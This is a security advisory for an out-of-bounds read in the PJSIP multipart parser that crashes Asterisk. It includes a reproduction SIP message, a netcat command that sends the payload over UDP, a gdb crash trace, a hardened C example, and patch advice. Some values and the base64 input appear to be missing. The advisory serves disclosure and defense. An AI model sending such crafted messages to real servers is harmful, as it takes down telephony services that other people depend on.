Asterisk 14.4.0 PJSIP 2.6 Denial Of Service

This vulnerability was discovered during an exercise with Sandro Gauci of Enable Security.

Out of bound memory access in PJSIP multipart parser crashes Asterisk


A specially crafted SIP message with a malformed multipart body was found to cause a segmentation fault.


Abuse of this vulnerability leads to denial of service in Asterisk when chan_pjsip is in use. This vulnerability is likely to affect other code that makes use of PJSIP.

How to reproduce the issue

We started Asterisk by running $PREFIX/asterisk/sbin/asterisk -fc. Then we made use of the following SIP message which was sent to Asterisk over UDP to reproduce the issue:

Via: SIP/2.0/UDP;branch=7c337f30d7ce.1
From: "Alice, A," <>
To: Bob <>
Contact: Alice <>
content-type: multipart/mixed;`boundary=++


Note that the above SIP message only contains new lines (i.e. \n) and no carriage returns (i.e. \r). We sent this message by making use of netcat as follows:

| base64 -d - | nc -u localhost 5060

The following is a log from running Asterisk in gdb:

gdb --args asterisk -c


Asterisk Ready.
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffd6b85700 (LWP 2625)]
0x00007ffff783fd4c in parse_multipart_part (pool=0x1dff930, 
    start=0x7ffff0004359 "--++=Discussion of Mbone Engineering
    Issues\\nc=IN IP4\nt=0
    0\nm=audio 3456 RTP/AVP 0\na=rtpmapt...\n--+", 
    len=18446744073709551615, pct=0x1dffd60) at
435             while (p!=end && *p!='\n') ++p;

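The issue appears to be due to the loop at line 435, which keeps advancing p until it reads from an invalid memory location, causing a memory access violation. The gdb output shows len=18446744073709551615, the maximum value of a 64-bit unsigned integer, so an end pointer derived from that length does not stop the scan (p!=end) inside the message buffer. The loop is found within parse_multipart_part at pjsip/sip_multipart.c:435.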
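A bounded version of the line scan discussed above, as an added example that is not PJSIP's code or the patch in revision 5594. It assumes the huge len comes from an unsigned subtraction of inverted offsets; the function names, offsets and sample body are constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample multipart body (not the message from the advisory). */
static const char SAMPLE[] = "--b\nContent-Type: text/plain\n\nhi\n--b--\n";

/* Unchecked length: when end_off < start_off the unsigned subtraction wraps,
 * giving a value like the len=18446744073709551615 seen in the gdb log. */
static size_t unchecked_len(size_t start_off, size_t end_off)
{
    return end_off - start_off;
}

/* Hardened scan for the end of the first line of a part.
 * Returns 0 and sets *line_len on success; returns -1 on inconsistent bounds
 * or when no '\n' lies inside the part. Never reads outside body[0..body_len). */
static int first_line_len(const char *body, size_t body_len,
                          size_t start_off, size_t end_off, size_t *line_len)
{
    if (body == NULL || line_len == NULL)
        return -1;
    if (start_off > end_off || end_off > body_len)
        return -1;                        /* rejects the wrapped-length case */
    size_t len = end_off - start_off;     /* cannot wrap after the check above */
    const char *nl = memchr(body + start_off, '\n', len);
    if (nl == NULL)
        return -1;                        /* unterminated line: stop, do not run on */
    *line_len = (size_t)(nl - (body + start_off));
    return 0;
}

int main(void)
{
    size_t n = 0, body_len = sizeof SAMPLE - 1;

    printf("unchecked len for inverted offsets: %zu\n", unchecked_len(5, 4));
    printf("valid part:       rc=%d\n", first_line_len(SAMPLE, body_len, 4, 29, &n));
    printf("first line bytes: %zu\n", n);
    printf("inverted offsets: rc=%d\n", first_line_len(SAMPLE, body_len, 5, 4, &n));
    printf("no newline:       rc=%d\n", first_line_len(SAMPLE, body_len, 4, 20, &n));
    return 0;
}
```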

This issue was found using AFL, while fuzzing PJSIP.

Solutions and recommendations

Apply the fix issued by Asterisk: upgrade to Asterisk 13.15.1, 14.4.1 or 13.13-cert4.

If making use of PJSIP, apply the patch in revision 5594. See